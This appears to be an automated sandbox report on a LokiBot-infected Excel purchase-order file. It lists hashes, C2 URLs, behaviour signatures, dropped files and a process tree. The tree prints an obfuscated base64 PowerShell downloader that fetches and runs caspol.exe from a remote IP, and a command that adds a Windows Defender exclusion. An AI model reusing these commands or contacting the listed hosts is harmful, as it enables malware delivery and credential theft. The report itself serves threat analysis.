Analysis

  • max time kernel
    140s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    18-11-2024 17:47

General

  • Target

    PO-000041492.xls

  • Size

    1.1MB

  • MD5

    f69d18b27ddddb4274a97434c6a01ae2

  • SHA1

    79a2cf394e8fe22341922a6490e9d58a87e2f748

  • SHA256

    555c9fab8b1c2180ec0c140d7ef7a072d3848661e47051b4dda5de40a61465b7

  • SHA512

    32acd768dc2ec5095216e946f8cd119174ee252d4691d4816f91881a3c5439db68feffe24bc85a16dcdf9caf3d53b82fa89f35b89540148e8c862664c851a77c

  • SSDEEP

    24576:6uq9PLiijE2Z5Z2amowshXCdQtF84LJQohVsx7ACKg0q9JfCazDVNPCTy2vo:6uEPLiij7Z5ZKowsAsFjLJQohVKEg0qR

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.95/maxzi/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-000041492.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2636
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
      "C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2416
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1404
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qk93a-ep.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5CC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5CB.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2012
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:968
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1980
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          PID:3024
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          PID:1996
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          PID:1948
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • outlook_office_path
          • outlook_win_path
          PID:2292

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B083487247EB8FBD76503EF0DA269B6B

    Filesize

    345B

    MD5

    dfe9d40108cd6499968560d0319998c6

    SHA1

    6b79281f7efec1b9fb942e6e0cd3eb5e9f776e73

    SHA256

    1dc7e4150fff57a7423b4d0ebeb3a5f966593b4dad4b803840f6c4a2f814951e

    SHA512

    5d4d685a5f15372d4ae8fdc08ab92d2f2f173f586b58315d35a62318f71b9fce7f84b4501f50024e95225a53856ab8170bcf1adf8805eaddb392250082c9ff56

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    18ed994e35845483e698cd86e55a8bf2

    SHA1

    c8816e93af865a45fa20c1cbcc9fd69fc29c4e75

    SHA256

    29f3037a0ec5d1ffa6dfd710258220b423e158e1a39e1fb3a009077cbccf3cb1

    SHA512

    a6217f931ebdc0aa4ebd95a86a0db911a2dbdd654ea72d1c1ea0d4c89ffaffabca2abf16e94e082d8ebc59e561f2df5bdce50884b5bf17f08e600d0bca54568e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    512bd3fdb8071bbb4d35ce589fe6571c

    SHA1

    e17d4c26d10fe5e709b3a3549006eb244529e6f7

    SHA256

    ce8a12bc8036707ad6c2c865bc1a8e97540361e07e62b27e5f7ea4d3e60165fc

    SHA512

    27ce8cb7c2931ccb00813922ddffe2b5f4d7302670e6fdda06ab677ba56d74f52511a592bbc84f2e946e7addae14cd05ad6e4ca67732005dc560bcf336185622

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B083487247EB8FBD76503EF0DA269B6B

    Filesize

    544B

    MD5

    0119335333261c14936f2646c0471b15

    SHA1

    d83abad73fafbcb44b5ffa5d06ca1d3b97959c3e

    SHA256

    323399364e979e8ada741b823f7f8a8bd035a36c4ba4b1a2fd101057d4251dec

    SHA512

    3dbb5c60cb09220ccdc4062aa37ab50b73792882118940dc2b3adf9efd355d09a25b3ae26d8786f99a69da474ee8b091fcef77618957ed0a18506be01b966c31

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor[1].hta

    Filesize

    8KB

    MD5

    db21eb9cf86a8314900d693c5a40c4e9

    SHA1

    1dd5c5e45f4c0224a6c4f4ce443bcb542fc5913c

    SHA256

    da1ae3eef8260a07b09c7978317fed23be8c431f2620629a9bc3f170df113102

    SHA512

    b589c6d47dd7dc29d3e8e6823c68966ee388d5e78fbc5b300abd38829443889591efe774564c861349dcad7b1981f9317b60fb1c19a3b232f12c64e403783f2c

  • C:\Users\Admin\AppData\Local\Temp\CabF058.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES5CC.tmp

    Filesize

    1KB

    MD5

    de45d5adf56769d6f21cbafd15cb93f2

    SHA1

    e377339bea1681eb06b04b417cdc88afa869f3dc

    SHA256

    156647b8206c95bc4070b37d85675bd3465fa15a4f1d25e33625c506f9ba0a0e

    SHA512

    6d5eb4a5db5dc3d5585aba858f8f7186faa3f244308bc4c166e93d49cd83206721fcf280d3220e08f3a85c4139974f4b346cac5fcc263346e578bd8b2cffc330

  • C:\Users\Admin\AppData\Local\Temp\qk93a-ep.dll

    Filesize

    3KB

    MD5

    cb506349d225018a4d8e37d35ce3459b

    SHA1

    dd76f6a79afd5d2ee943909d55f24325d003d1e7

    SHA256

    7c4bd4101adbae94f38a08f6f6606559468e544ee16c199da7b49baf093609f7

    SHA512

    fad78a106a0ebe332c399af7f42a292ea1103783be9a40e41d1b6d7226ba115ccf7bfd1b998a6821c567358c7d97f22a7986a8dffbb47058b3ab550ec198a250

  • C:\Users\Admin\AppData\Local\Temp\qk93a-ep.pdb

    Filesize

    7KB

    MD5

    03f727298ed7d2695597a8d213f2faef

    SHA1

    d64c77cd944af481fae3f772b8cf8e831d5f6b8d

    SHA256

    b7151d0620b3dc1991080e325f511f1e129544facb92a76d217b107f92ac25c6

    SHA512

    0d91fcf894a60bdc26cb8b36dba717ea58512c6d2c6a0dff470bbe68e8a4f3806744e83f2e31271420f4e8f942f9a5d3be5575d805fc44827ee52c14936a69e2

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    72dedba1ca2861970a3e96b93b4e916d

    SHA1

    527c5f09726b73a5b9070675c6d702750bc0868d

    SHA256

    06a4311011084bdec6fe8eda8c6d1a2681aba0353d4c96a4089dece3c970c911

    SHA512

    025a3095161c0b2201d544b3819ce70be5bbfe66e69559d46a16e40310731ddcc1e88e92e8276c1b0d754c651a2f2cea95d976adc32ed5c4d46d909e484686dc

  • C:\Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    570KB

    MD5

    80358303e33cef71434e6e4a621262c5

    SHA1

    e7a22b4e5af741f9b4d9982f36164b276bba459a

    SHA256

    f3246d0ca5ca8e69f98ca33b2c17813d5d862049dcfa9931dbcbaaaf7543a1f7

    SHA512

    5e68b8c63afe7c0e91396f42f485cd84946235ab11d9ce7107bbcf75568ff3087d5e14378f87d77733376e332f516f26db838b870ca580569178b15c0a90761e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC5CB.tmp

    Filesize

    652B

    MD5

    86ee229377d5dd9fa4df127e75df942b

    SHA1

    394242040d8daf6eb739025fef9509df7332ff90

    SHA256

    385d734cb7169703ba5babe974906acc32f53d066957ab1a7f9f8748fd932a8f

    SHA512

    95fe81e34756943cf7b1b349ab8ec056bd6005a24bf3a8d8040354b392701a76a045a649c067f2eb8f4895dbc22f18dc0554c7f8a1468f189ad748785951c2d1

  • \??\c:\Users\Admin\AppData\Local\Temp\qk93a-ep.0.cs

    Filesize

    477B

    MD5

    f97fc8141f59078b4354b513d3b083ac

    SHA1

    293904ab8d5f38a2f0764ee2e35e97e590d8c737

    SHA256

    f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e

    SHA512

    87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c

  • \??\c:\Users\Admin\AppData\Local\Temp\qk93a-ep.cmdline

    Filesize

    309B

    MD5

    914e799a7629b8633112a601d2237f0a

    SHA1

    1fc3870c068b7711356e779c339f77b4f87ac2b2

    SHA256

    369f707b61aa55c61f51e1bdfc093c2143433f77e74df4716239828363451dfe

    SHA512

    8d395038e526362427ee80940cc06d374898a401eb28ad65640186f2ffa5af4f0f9dabd915c5c329682c44c4699ad16651661c87f7a7ecebc4c846fd1fd41515

  • memory/968-74-0x0000000000210000-0x00000000002A4000-memory.dmp

    Filesize

    592KB

  • memory/968-76-0x00000000056C0000-0x0000000005724000-memory.dmp

    Filesize

    400KB

  • memory/968-75-0x0000000000320000-0x0000000000332000-memory.dmp

    Filesize

    72KB

  • memory/2292-91-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2292-80-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2292-90-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2292-88-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2292-86-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2292-84-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2292-82-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2292-93-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2636-1-0x000000007403D000-0x0000000074048000-memory.dmp

    Filesize

    44KB

  • memory/2636-59-0x000000007403D000-0x0000000074048000-memory.dmp

    Filesize

    44KB

  • memory/2636-19-0x0000000002510000-0x0000000002512000-memory.dmp

    Filesize

    8KB

  • memory/2636-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2684-18-0x0000000002640000-0x0000000002642000-memory.dmp

    Filesize

    8KB